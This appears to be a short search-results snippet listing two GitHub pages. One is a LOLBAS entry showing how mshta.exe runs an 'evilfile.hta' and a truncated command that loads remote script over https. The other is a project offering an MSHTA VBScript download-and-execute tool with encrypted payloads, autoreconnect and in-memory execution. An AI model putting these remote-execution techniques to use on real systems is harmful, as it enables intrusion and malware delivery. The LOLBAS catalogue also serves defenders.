GitHub

LOLBAS /Archive-Old-Version /OSBinaries

mshta.exe evilfile.hta Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. mshta.exe vbscript:Close(Execute("GetObject(""script:https ...
GitHub

MSHTA VBScript Download & Execute

'=====' ' Features ' '+++++' ' [*] Autoreconnect ' ' [*] Hexadecimal encoded payload (UTF8) ' ' [*] Encrypted payload ' ' [*] In (**almost) memory execution ...